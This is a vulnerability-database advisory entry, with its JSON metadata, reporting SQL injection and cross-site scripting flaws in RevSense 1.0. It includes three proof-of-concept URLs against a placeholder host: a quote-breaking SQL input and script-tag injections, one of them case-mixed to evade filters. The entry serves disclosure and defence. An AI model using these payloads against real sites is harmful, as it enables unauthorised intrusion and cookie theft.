RevSense 1.0 SQL Injection and Cross Site Scripting Vulnerabilities
2014-07-01T00:00:00
ID SSV:85921 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/32624/info
RevSense is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RevSense 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"§ion=user&action=login
http://www.example.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya
http://www.example.com/index.php?section=<script>alert(1369)</script>&action=login
{"href": "https://www.seebug.org/vuldb/ssvid-85921", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "RevSense 1.0 SQL Injection and Cross Site Scripting Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-85921", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/32624/info\r\n\r\nRevSense is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.\r\n\r\nRevSense 1.0 is vulnerable; other versions may also be affected.\r\n\r\nhttp://www.example.com/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\\"§ion=user&action=login\r\nhttp://www.example.com/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya\r\nhttp://www.example.com/index.php?section=<script>alert(1369)</script>&action=login \n ", "id": "SSV:85921", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:59:45", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2017-11-19T15:59:45", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T15:59:45", "rev": 2}, "vulnersScore": -0.1}, "references": []}